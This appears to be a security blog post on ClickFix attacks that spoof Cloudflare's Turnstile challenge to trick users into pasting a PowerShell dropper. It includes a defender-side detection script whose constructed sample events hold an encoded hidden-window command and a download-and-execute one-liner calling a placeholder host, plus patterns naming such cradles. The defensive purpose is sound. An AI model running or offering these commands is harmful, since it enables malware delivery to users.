ClickFix Cloudflare Impersonation Attack

A fake Cloudflare challenge delivering an obfuscated PowerShell dropper

Mohamed Bilal · 4 min read

ClickFix Introduction

Before diving into the core topic of this post, let’s first define the ClickFix technique and explore its potential impact on a compromised machine.

ClickFix is a social engineering technique designed to trick a user into fixing a problem that doesn’t actually exist. It typically achieves this through a deceptive pop-up that draws the user’s attention toward an imaginary issue.

Imagine this scenario: a pop-up reads, “Perform the below instructions on your PC to download this movie,” appearing right as you attempt to download a pirated 4K copy of your favorite film. Add to that the hours you have already spent hunting for a high-quality release without success. You finally land on a site featuring crisp screenshots, and the only thing standing between you and the movie is a tiny pop-up outlining three simple steps.

You would be surprised by how many people fall into this trap, even fairly knowledgeable IT professionals.


Disclaimer: We at coderevere strongly discourage any form of piracy. The above text and example are used strictly for demonstration purposes. Most piracy attempts lead directly to malicious software and social engineering traps anyway.

So, what exactly is social engineering we keep mentioning?

Social engineering is a psychological manipulation technique used to influence people into performing a specific set of actions that are ultimately detrimental to them. It can serve various malicious purposes, including stealing sensitive information, gaining unauthorized access, or committing fraud. I intend to cover this subject in much more detail in a separate blog post.

Cloudflare Challenge

Cloudflare, as most of you are likely aware, is a cybersecurity giant that offers a popular, free alternative to traditional CAPTCHAs. The challenge pops up in the browser when Cloudflare suspects bot or unusual activity originating from an end-user’s device or IP address. Cloudflare’s version of this challenge is called “Turnstile.”

Turnstile is designed to make it exceptionally easy for humans to verify themselves, unlike traditional puzzle-based CAPTCHAs that can be difficult, require multiple attempts, and often leave users frustrated. Turnstile features a simple checkbox that is seamless for human users but significantly harder for automated bots to bypass behind the scenes.

Cloudflare Turnstile Usage

Based on data from BuiltWith and Wappalyzer, Cloudflare Turnstile is currently live on approximately half a million websites. That provides Cloudflare with an immense dataset to train its bot-detection capabilities. What remains up for debate is the quality of the data Cloudflare gathers here; because it is a free tool, many smaller websites using Turnstile might not have sufficient traffic and may not attract the sophisticated bot operators that larger targets do. Nevertheless, it is a fact that many top-tier websites leverage Turnstile, and it ranks highly in the CAPTCHA alternative space.

ClickFix Attack: Cloudflare Impersonation

A Reddit user recently highlighted a new technique in this space where users are presented with what appears to be an innocent Cloudflare challenge pop-up. However, it is entirely illegitimate. It is a spoof designed to impersonate Cloudflare’s styling elements, tricking users into following its instructions, the effects of which can be devastating.

The fake page instructs Windows users to:

  • Open PowerShell (Win + X)
  • Paste a malicious script
  • Hit Enter

The pasted script is almost certainly a dropper: once executed, it fetches and runs a secondary payload, which may turn out to be an Information Stealer, Ransomware, or a Remote Access Trojan (RAT). While the exact payload in this specific instance may not have been safely detonated and identified yet, the intent is clearly malicious. I am intentionally omitting the actual script here for safety reasons. If you are interested, you can find the technical discussion on Reddit.

Please note that PowerShell is incredibly powerful. When run with administrator privileges, it can easily be used to disable or override antivirus programs, making these types of social engineering attacks extremely dangerous.
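As an added defender-side example (not part of the original post or of the Reddit thread), here is a small Python triage script that scores process-creation records for the traits a pasted ClickFix PowerShell dropper typically shows: an encoded or hidden-window invocation, a download cradle, and a parent process that is an interactive shell rather than a management agent. The sample events and the placeholder host are constructed, and the indicator weights and threshold are my assumptions, not a published detection rule.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style fields); not real telemetry.
SAMPLE_EVENTS = [
    # Encoded, hidden-window one-liner pasted into a console opened from the desktop.
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -w hidden -nop -ep bypass -enc "
                "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"},
    # The console the victim opens with Win+X: benign on its own.
    {"id": 2, "parent": r"C:\Windows\explorer.exe", "cmdline": "powershell.exe"},
    # A pasted one-liner that pulls a stage-two script from a placeholder host.
    {"id": 3, "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -c \"iex (iwr 'http://placeholder.invalid/x.ps1').Content\""},
    # Inventory script launched by a management agent: normal administrative use.
    {"id": 4, "parent": r"C:\Program Files\Vendor\Agent.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\ProgramData\Vendor\inventory.ps1"},
]

# (pattern, weight, label): traits common in pasted droppers; each is weak on its own.
INDICATORS = [
    (r"-e(nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{40,}", 3, "base64-encoded command"),
    (r"\b(iex|invoke-expression)\b", 2, "Invoke-Expression"),
    (r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient)\b", 2, "download cradle"),
    (r"-w(indowstyle)?\s+hidden", 2, "hidden window"),
    (r"-(nop|noprofile)\b", 1, "profile suppressed"),
    (r"-e(p|xecutionpolicy)\s+bypass", 1, "execution policy bypass"),
    (r"frombase64string|\[char\]|-join\b|-replace\b", 1, "string obfuscation"),
]
INTERACTIVE_PARENTS = {"explorer.exe", "powershell.exe", "cmd.exe", "windowsterminal.exe"}

def score_event(event):
    """Return (score, reasons) for one process-creation record."""
    score, reasons = 0, []
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, event["cmdline"], re.IGNORECASE):
            score += weight
            reasons.append(label)
    # A PowerShell child of an interactive shell is consistent with a user pasting the command.
    if event["parent"].rsplit("\\", 1)[-1].lower() in INTERACTIVE_PARENTS:
        score += 1
        reasons.append("spawned from interactive session")
    return score, reasons

def flag_clickfix(events, threshold=4):
    """Return the ids of events whose combined score reaches the threshold (assumed value)."""
    return [e["id"] for e in events if score_event(e)[0] >= threshold]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(e["id"], *score_event(e))
    print("flagged:", flag_clickfix(SAMPLE_EVENTS))
```

On the constructed events, only the two pasted one-liners reach the threshold; the bare console and the agent-launched inventory script do not.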

Snapshot: ClickFix

Impact

Naturally, there is debate on Reddit regarding the efficacy of such attacks, as they seem quite “in your face.” Many users are astonished that someone could be tricked by a tactic as simple as copying and pasting a script.

However, data consistently shows that many people do fall prey to these attempts. While non-IT folks are generally easier targets, IT professionals are frequently compromised as well. There are several ClickFix campaigns that specifically pretend to solve a system error. Because many IT professionals have a natural inclination to troubleshoot and fix system issues, their own curiosity can be weaponized against them. In fact, many seasoned IT professionals have admitted to being duped by highly targeted phishing attempts just like this one.
